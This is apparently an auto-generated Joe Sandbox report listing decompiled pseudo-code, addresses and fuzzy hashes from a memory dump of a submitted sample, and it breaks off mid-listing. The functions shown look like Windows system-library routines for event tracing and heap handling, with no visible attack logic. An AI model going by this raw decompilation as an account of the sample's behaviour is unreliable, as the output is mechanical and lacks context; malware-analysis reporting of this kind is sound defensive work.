                                                    • API String ID:
                                                    • Opcode ID: e6634cf51dc10082bd54e8638c6525906f2a414b8d685d314289e016a65f69a8
                                                    • Instruction ID: 5e34ba572fac9d709e3e3541b47e9bfbfd1ee7ee9eead7f761f23aa349f40efa
                                                    • Opcode Fuzzy Hash: e6634cf51dc10082bd54e8638c6525906f2a414b8d685d314289e016a65f69a8
                                                    • Instruction Fuzzy Hash: 27018871A0020DABDB14DBA9D845FAFB7B8EF45700F40406AFA00DB380D970DA11C795
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0186FE3F Relevance: .0, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 59%
                                                    			E0186FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x18ad360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E017FFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E017D7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E017FB640(E017F9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                    0x0186fe3f
                                                    0x0186fe3f
                                                    0x0186fe4e
                                                    0x0186fe58
                                                    0x0186fe5d
                                                    0x0186fe5f
                                                    0x0186fe6a
                                                    0x0186fe72
                                                    0x0186fe75
                                                    0x0186fe78
                                                    0x0186fe83
                                                    0x0186fe95
                                                    0x0186fe85
                                                    0x0186fe8e
                                                    0x0186fe8e
                                                    0x0186fea0
                                                    0x0186fea1
                                                    0x0186fea3
                                                    0x0186fea8
                                                    0x0186febd

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 166adf2f71b40fd2ff18d21f5e6de96c92df2902b823ef3602fff372ded7afdb
                                                    • Instruction ID: 6ff15c3a7fb58e4ccd3fb853df2f65c90e5068097d47e05f1f7ecba13be4e82e
                                                    • Opcode Fuzzy Hash: 166adf2f71b40fd2ff18d21f5e6de96c92df2902b823ef3602fff372ded7afdb
                                                    • Instruction Fuzzy Hash: FC017171A00209ABDB14DBA9D845FAFBBB8EF44704F40406AFA00EB381DA70DA11CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01888A62 Relevance: .0, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 54%
                                                    			E01888A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x18ad360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E017D7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E017FB640(E017F9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                    0x01888a62
                                                    0x01888a71
                                                    0x01888a79
                                                    0x01888a82
                                                    0x01888a85
                                                    0x01888a89
                                                    0x01888a8c
                                                    0x01888a8f
                                                    0x01888a92
                                                    0x01888a95
                                                    0x01888a9f
                                                    0x01888ab1
                                                    0x01888aa1
                                                    0x01888aaa
                                                    0x01888aaa
                                                    0x01888abc
                                                    0x01888abd
                                                    0x01888abf
                                                    0x01888ac4
                                                    0x01888ada

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 63d3529055dd80f7fec900ca0cc010d04fbd0ed2dc60e474f410f575ec2bb5b2
                                                    • Instruction ID: cc17823d980f944b70467abf0a980d767b4b13f87aeeaf489bf013fc2b1888c1
                                                    • Opcode Fuzzy Hash: 63d3529055dd80f7fec900ca0cc010d04fbd0ed2dc60e474f410f575ec2bb5b2
                                                    • Instruction Fuzzy Hash: 0A012171A0021D9FDB04DFA9D9459AEF7B8EF59310F50405AFA04E7341D634AA00CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01888ED6 Relevance: .0, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 54%
                                                    			E01888ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x18ad360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E017D7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E017FB640(E017F9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                    0x01888ed6
                                                    0x01888ee5
                                                    0x01888eed
                                                    0x01888ef0
                                                    0x01888efa
                                                    0x01888f03
                                                    0x01888f0c
                                                    0x01888f15
                                                    0x01888f24
                                                    0x01888f27
                                                    0x01888f31
                                                    0x01888f43
                                                    0x01888f33
                                                    0x01888f3c
                                                    0x01888f3c
                                                    0x01888f4e
                                                    0x01888f4f
                                                    0x01888f51
                                                    0x01888f56
                                                    0x01888f69

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 23232d4800488a646933299972a13d47daa2f4dcb923aac81b75e1dbdddbb893
                                                    • Instruction ID: 14c644108d91f6655230f650561a451ac466bd3b34cf6c2b1b973e33e9b9cf75
                                                    • Opcode Fuzzy Hash: 23232d4800488a646933299972a13d47daa2f4dcb923aac81b75e1dbdddbb893
                                                    • Instruction Fuzzy Hash: 5E111E70A0020A9FDB04DFA9D445BAEFBF4FF08300F4442AAE518EB781E6349A40CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017BDB60 Relevance: .0, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E017BDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E017BDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E017BE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L017BE8B0(__ecx, _t14, 0xfff);
							L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                    0x017bdb64
                                                    0x017bdb66
                                                    0x017bdb6b
                                                    0x017bdbaa
                                                    0x017bdb71
                                                    0x017bdb76
                                                    0x017bdb7a
                                                    0x017bdba3
                                                    0x017bdb7c
                                                    0x017bdb87
                                                    0x017bdb8b
                                                    0x01814fa1
                                                    0x01814fb3
                                                    0x01814fb8
                                                    0x017bdb91
                                                    0x017bdb96
                                                    0x017bdb98
                                                    0x017bdb98
                                                    0x017bdb8b
                                                    0x017bdb7a
                                                    0x017bdb9d
                                                    0x017bdba2

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                    • Instruction ID: de4339298867f2f4a34c78acd9cc8955541007d2e1636ab3440ba02d8eb00f4e
                                                    • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                    • Instruction Fuzzy Hash: 9BF068332415239BD7325AD9C8C4BD7F6969F91B64F160475F2059B348CF64880296D5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017BB1E1 Relevance: .0, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E017BB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E017D7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E017D7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E01837016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                    0x017bb1e8
                                                    0x017bb1ea
                                                    0x017bb1f3
                                                    0x01814a17
                                                    0x017bb1f9
                                                    0x017bb1f9
                                                    0x017bb1f9
                                                    0x017bb201
                                                    0x01814a21
                                                    0x01814a2e
                                                    0x00000000
                                                    0x00000000
                                                    0x01814a3b
                                                    0x01814a4d
                                                    0x01814a3d
                                                    0x01814a46
                                                    0x01814a46
                                                    0x01814a55
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017bb20a
                                                    0x017bb20a
                                                    0x017bb20a
                                                    0x017bb20a

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                    • Instruction ID: ec3768e67d4fb386f3125efc39fd1ba8d9a77ab9bf1bc81ec6cf7c30e9b48c3f
                                                    • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                    • Instruction Fuzzy Hash: 2301D1336046849BD322975DC848FA9BB99EF92754F4900A1FE14CB6B6D778D940C215
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0184FE87 Relevance: .0, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 46%
                                                    			E0184FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x18ad360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E017D7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E017FB640(E017F9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                    0x0184fe96
                                                    0x0184fe9e
                                                    0x0184fea1
                                                    0x0184fead
                                                    0x0184feb3
                                                    0x0184feb9
                                                    0x0184fec3
                                                    0x0184fed5
                                                    0x0184fec5
                                                    0x0184fece
                                                    0x0184fece
                                                    0x0184fee0
                                                    0x0184fee1
                                                    0x0184fee3
                                                    0x0184fee8
                                                    0x0184fefb

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e8b2cca75375a57e4edbf170a71de6194994441231daa36d51bc3e7e1ccdf6b1
                                                    • Instruction ID: a01ab64c737080fb70fa15b7efc55ffe5db8403ccc719c5e3a1d9885f310d2ea
                                                    • Opcode Fuzzy Hash: e8b2cca75375a57e4edbf170a71de6194994441231daa36d51bc3e7e1ccdf6b1
                                                    • Instruction Fuzzy Hash: CF016270A0020DEFCB14DFA8D545A6EB7F4EF04704F504159B604DB382DA35DA01CB41
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0187131B Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 48%
                                                    			E0187131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x18ad360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E017D7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E017FB640(E017F9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                    0x0187131b
                                                    0x0187132a
                                                    0x01871330
                                                    0x01871336
                                                    0x0187133e
                                                    0x01871341
                                                    0x01871344
                                                    0x0187134f
                                                    0x01871361
                                                    0x01871351
                                                    0x0187135a
                                                    0x0187135a
                                                    0x0187136c
                                                    0x0187136d
                                                    0x0187136f
                                                    0x01871374
                                                    0x01871387

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 630888494844478b262782f62f1b8f152e966c84e63db852fecc523330e21f38
                                                    • Instruction ID: d8f8cda5fb2f559c3232af23c6b50bb686c8d002cfdefe05bffb489915e8b831
                                                    • Opcode Fuzzy Hash: 630888494844478b262782f62f1b8f152e966c84e63db852fecc523330e21f38
                                                    • Instruction Fuzzy Hash: 4A011971A0120DAFCB04EFA9D549AAEB7F4EF18700F404059F905EB781E634DA00CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01888F6A Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 48%
                                                    			E01888F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x18ad360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E017D7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E017FB640(E017F9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                    0x01888f6a
                                                    0x01888f79
                                                    0x01888f81
                                                    0x01888f84
                                                    0x01888f8b
                                                    0x01888f91
                                                    0x01888f94
                                                    0x01888f9e
                                                    0x01888fb0
                                                    0x01888fa0
                                                    0x01888fa9
                                                    0x01888fa9
                                                    0x01888fbb
                                                    0x01888fbc
                                                    0x01888fbe
                                                    0x01888fc3
                                                    0x01888fd6

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4851cf7cada4c56fe2de0f5340f7963ee7d5e745fa0af8c8adacc44d71027adc
                                                    • Instruction ID: ce44bf8c4306c92545ec8c45914613c68ae8f75134b6d7eb33b6039c270c0c71
                                                    • Opcode Fuzzy Hash: 4851cf7cada4c56fe2de0f5340f7963ee7d5e745fa0af8c8adacc44d71027adc
                                                    • Instruction Fuzzy Hash: AB014F74A0020DAFDB04EFA8D545AAEF7F4EF18300F504059BA05EB384EA34DB00CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01871608 Relevance: .0, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 46%
                                                    			E01871608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x18ad360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E017D7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E017FB640(E017F9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                                    0x01871608
                                                    0x01871617
                                                    0x0187161d
                                                    0x01871625
                                                    0x01871628
                                                    0x0187162b
                                                    0x01871636
                                                    0x01871648
                                                    0x01871638
                                                    0x01871641
                                                    0x01871641
                                                    0x01871653
                                                    0x01871654
                                                    0x01871656
                                                    0x0187165b
                                                    0x0187166e

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 217aba2298d319850b7c7379f578c0740494bb4b4c83d3003f5ae3af1b5c500c
                                                    • Instruction ID: bdc9287b7c357d986bd20f10d3cd85f5dab54fa53d251538f29e36663f259558
                                                    • Opcode Fuzzy Hash: 217aba2298d319850b7c7379f578c0740494bb4b4c83d3003f5ae3af1b5c500c
                                                    • Instruction Fuzzy Hash: 89F06271A0424CEFDB14EFA9D449A6FB7F4EF14300F444059BA05EB381E634DA00CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017DC577 Relevance: .0, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E017DC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E017DC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x17911cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E018888F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                    0x017dc577
                                                    0x017dc57d
                                                    0x017dc581
                                                    0x017dc5b5
                                                    0x017dc5b9
                                                    0x017dc5ce
                                                    0x017dc5ce
                                                    0x017dc5ca
                                                    0x00000000
                                                    0x017dc5ca
                                                    0x017dc5c4
                                                    0x017dc5c8
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017dc5ad
                                                    0x00000000
                                                    0x017dc5af

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a304cd1fe8640898e98024ec436901ac34540f5b92962c7e7d9cb5f4578958e5
                                                    • Instruction ID: c929ea566cf1fa7aa6516cc3bd494e41f9a2d4010c56f6fdc79dc0ad1d410abc
                                                    • Opcode Fuzzy Hash: a304cd1fe8640898e98024ec436901ac34540f5b92962c7e7d9cb5f4578958e5
                                                    • Instruction Fuzzy Hash: F9F09AB29156999EE737972C8104B22FFF99B15670FF884AED51787202C6A4D880C261
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01872073 Relevance: .0, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 94%
                                                    			E01872073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0186FD22(__ecx);
				_t19 =  *0x18a849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x18a8748; // 0x0
					if(__eflags <= 0) {
						E01871C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x18a8724 & 0x00000004;
							if(( *0x18a8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x18a8724; // 0x0
					return E01868DF1(__ebx, 0xc0000374, 0x18a5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                    0x01872076
                                                    0x01872078
                                                    0x0187207d
                                                    0x01872083
                                                    0x018720a4
                                                    0x018720aa
                                                    0x018720ac
                                                    0x018720b7
                                                    0x018720ba
                                                    0x018720bc
                                                    0x018720c9
                                                    0x018720c9
                                                    0x018720d0
                                                    0x018720d2
                                                    0x00000000
                                                    0x018720d2
                                                    0x018720be
                                                    0x018720c3
                                                    0x018720c5
                                                    0x018720c7
                                                    0x00000000
                                                    0x00000000
                                                    0x018720c7
                                                    0x018720bc
                                                    0x018720d4
                                                    0x01872085
                                                    0x01872085
                                                    0x018720a3
                                                    0x018720a3

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dde1654ad74b38fd4e28db73b7c581cf8d0a60b4329f2e9d858d98d81ccccdaa
                                                    • Instruction ID: dde0684ccf1ed20399c02bd22e0b6bbad6e427b388041ce853019ffbbe606beb
                                                    • Opcode Fuzzy Hash: dde1654ad74b38fd4e28db73b7c581cf8d0a60b4329f2e9d858d98d81ccccdaa
                                                    • Instruction Fuzzy Hash: 1CF0A06A42A5954BEF336B6C75112E23FD7E7A6311B890485D5A0D7209C538CB93CF31
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F927A Relevance: .0, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 54%
                                                    			E017F927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L017D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E017FFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E017F92C6(_t11, _t14);
				}
				return _t11;
			}





                                                    0x017f9295
                                                    0x017f9299
                                                    0x017f929f
                                                    0x017f92aa
                                                    0x017f92ad
                                                    0x017f92ae
                                                    0x017f92af
                                                    0x017f92b0
                                                    0x017f92b4
                                                    0x017f92bb
                                                    0x017f92bb
                                                    0x017f92c5

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                    • Instruction ID: 3023a1c52c491cfaba5fba7b3d1d302711d7e003d29376f54baf4e9b65eb2a73
                                                    • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                    • Instruction Fuzzy Hash: A3E0ED322406016BE7219F0ACC88B03B6A9AF92724F00407CBA001E382CAE6D90887A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01888D34 Relevance: .0, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 43%
                                                    			E01888D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x18ad360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E017D7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E017FB640(E017F9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                    0x01888d34
                                                    0x01888d43
                                                    0x01888d4b
                                                    0x01888d4e
                                                    0x01888d52
                                                    0x01888d5c
                                                    0x01888d6e
                                                    0x01888d5e
                                                    0x01888d67
